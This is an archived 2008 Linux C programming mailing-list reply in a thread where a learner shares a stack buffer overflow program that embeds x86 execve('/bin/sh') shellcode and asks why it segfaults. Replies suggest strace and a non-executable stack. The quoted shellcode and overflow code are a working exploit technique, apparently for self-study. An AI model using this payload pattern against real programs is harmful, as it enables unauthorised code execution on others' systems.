From mboxrd@z Thu Jan 1 00:00:00 1970 From: ninjaboy Subject: Re: buffer overflow Date: Tue, 11 Mar 2008 13:12:29 +0100 Message-ID: References: <47D621E6.1090403@linux.vnet.ibm.com> <1205229858.4033.12.camel@debian.nordiclan.net> <47D661D0.90905@linux.vnet.ibm.com> <1205237049.28040.0.camel@debian.nordiclan.net> Mime-Version: 1.0 Content-Transfer-Encoding: QUOTED-PRINTABLE Return-path: DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; bh=5boT4YI6cTXbhggBHOqXEo/NkImkkH/WISgFr9blD4s=; b=oZKnu2wyHYsLi9uSJGulz5e3WJmjobCWopbXY9hNXFhAuRjb5WdnJaHFNxM57TRlepLYDhMDZylJksiaI476qGyajdv2a3HdwC4I4H6h6y67d1Nee1x9+fheIIFjTa7sBPP0oecWVX+UjWI+VCGopFf83MOOimHzPR5e7eYN3bk= In-Reply-To: <1205237049.28040.0.camel@debian.nordiclan.net> Content-Disposition: inline Sender: linux-c-programming-owner@vger.kernel.org List-ID: Content-Type: text/plain; charset="iso-8859-1" To: "=?ISO-8859-1?Q?Patrik_B=E5t,_RTL?=" Cc: Varun Chandramohan , linux-c-programming@vger.kernel.org 2008/3/11, Patrik B=E5t, RTL : > Yeah, maybe some hardcore c coder in here can help you more... > > My primary "tip of the day" was strace ;) > > > tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan: > > Patrik B=E5t wrote: > > > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan: > > > > > >> Hi all, > > >> > > >> Can someone tell me whats is wrong with this progr= am? All i > > >> get is seg fault. Iam trying to create a stack overflow and exe= c a > > >> shell. Somehow its not working. The system is x86 on linux. > > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) > > >> Copyright (C) 2006 Free Software Foundation, Inc. > > >> This is free software; see the source for copying conditions. = There is NO > > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICU= LAR PURPOSE. > > >> > > >> > > >> > > >> The Code: > > >> #include > > >> #include > > >> > > >> char shellcode[] =3D > > >> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x= 0c\xb0\x0b" > > >> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\x= d8\x40\xcd" > > >> "\x80\xe8\xdc\xff\xff\xff/bin/sh"; > > >> #if 0 > > >> char shellcode[] =3D > > >> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x= 00\x00\x00" > > >> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x= 0c\xcd\x80" > > >> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\x= d1\xff\xff" > > >> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; > > >> > > >> #endif > > >> > > >> char large_string[128]; > > >> int main() { > > >> char buffer[96]; > > >> int i; > > >> long *long_ptr =3D (long *) large_string; > > >> memset(&buffer,0,sizeof(buffer)); > > >> > > >> for (i =3D 0; i < 32; i++) > > >> *(long_ptr + i) =3D (long)&buffer; > > >> > > >> for (i =3D 0; i < strlen(shellcode); i++) > > >> large_string[i] =3D shellcode[i]; > > >> > > >> strcpy(buffer,large_string); > > >> > > > strcpy(large_string,buffer); > > > > > > //This is working tho... > > > > > Thanks for the reply, but this doesnt spawn a shell, does it? This > > simply avoids the sigsegv > > >> } Maybe stack is not executable? --=20 noone is alone. -- To unsubscribe from this list: send the line "unsubscribe linux-c-progr= amming" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html